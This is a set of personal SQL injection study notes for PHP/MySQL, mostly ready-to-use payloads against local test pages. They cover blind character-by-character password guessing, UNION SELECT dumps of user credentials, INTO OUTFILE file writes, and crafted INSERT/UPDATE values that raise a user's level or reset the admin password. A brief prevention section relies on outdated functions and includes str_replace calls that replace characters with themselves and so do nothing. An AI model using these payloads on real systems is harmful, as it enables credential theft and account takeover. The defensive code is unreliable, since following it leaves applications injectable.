The focus of SQL injection is to construct SQL statements. Only by flexibly using SQL
statements can we construct incredible injection strings. After studying, I wrote some notes and have them ready for use at any time. I hope you will
understand the basic principles of SQL when reading the following content. The code in the notes comes from the Internet.
===Basic part===
This table query:
http://127.0.0.1/injection/user.php?username=angel' and LENGTH(password)='6
http://127.0.0.1/injection/user.php?username=angel' and LEFT(password,1)='m
Union union statement:
http://127.0.0.1/injection /show.php?id=1' union select 1,username,password from user/*
http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user/ *
Export file:
http://127.0.0.1/injection/user.php?username=angel' into outfile 'c:/file.txt
http://127.0.0.1 /injection/user.php?username=' or 1=1 into outfile 'c:/file.txt
http://127.0.0.1/injection/show.php?id=' union select 1,username,password from user into outfile 'c:/user.txt
INSERT statement:
INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', ' $password', '$homepage', '1');
The constructed homepage value is: http://4ngel.net', '3')#
The SQL statement becomes: INSERT INTO `user` ( userid, username, password, homepage, userlevel) VALUES ('', 'angel', 'mypass', 'http://4ngel.net', '3')#', '1');
UPDATE statement: I like something like this
Understand this SQL sentence first
UPDATE user SET password='MD5($password)', homepage='$homepage' WHERE id='$id'
If This SQL is modified into the following form to achieve injection
1: modify the homepage value to
http://4ngel.net', userlevel='3
and then the SQL statement becomes
UPDATE user SET password='mypass', homepage='http://4ngel.net', userlevel='3' WHERE id='$id'
userlevel is the user level
2: Modify the password value to
mypass)' WHERE username='admin'#
Then the SQL statement becomes
UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id ='$id'
3: Modify the id value to
' OR username='admin'
Then the SQL statement becomes
UPDATE user SET password='MD5($password)', homepage= '$homepage' WHERE id='' OR username='admin'
===Advanced part===
Commonly used MySQL built-in functions
DATABASE()
USER()
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
database()
version()
SUBSTRING()
MID()
char()
load_file()
......
Function application
UPDATE article SET title=DATABASE() WHERE id=1
http://127.0.0.1/injection/show.php?id=-1 union select 1,database(),version()
SELECT * FROM user WHERE username=char(97,110,103,101,108)
# char(97,110,103,101,108) is equivalent to angel, decimal
http://127.0.0.1/injection/ user.php?userid=1 and password=char(109,121,112,97,115,115)http://127.0.0.1/injection/user.php?userid=1 and LEFT(password,1)>char(100)
http ://127.0.0.1/injection/user.php?userid=1 and ord(mid(password,3,1))>111
Determine the number and type of fields in the data structure
http ://127.0.0.1/injection/show.php?id=-1 union select 1,1,1
http://127.0.0.1/injection/show.php?id=-1 union select char(97 ),char(97),char(97)
Guess the data table name
http://127.0.0.1/injection/show.php?id=-1 union select 1,1,1 from members
Cross-table query to get username and password
http://127.0.0.1/ymdown/show.php?id=10000 union select 1,username,1,password,1,1,1, 1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1
Others
#Verify first password
http: //127.0.0.1/ymdown/show.php?id=10 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49
===Injection Prevention===
Server side
magic_quotes_gpc is set to On
display_errors is set to Off
Encoding aspect
$keywords = addslashes($keywords);
$keywords = str_replace("_","_",$keywords);
$keywords = str_replace("%","%",$keywords);
Numeric type
Use intval() to replace
String type
Add single quotes to SQL statement parameters
The following code , used to prevent injection
if (get_magic_quotes_gpc()) {
//....
}else{
$str = mysql_real_escape_string($str);
$keywords = str_replace( "_","_",$keywords);
$keywords = str_replace("%","%",$keywords);
}
Useful functions
stripslashes()
get_magic_quotes_gpc()
mysql_real_escape_string()
strip_tags()
array_map()
addslashes()
Reference article:
http://www.4ngel.net/article/36 .htm (SQL Injection with MySQL) Chinese
http://www.phpe.net/mysql_manual/06-4.html (MYSQL statement reference)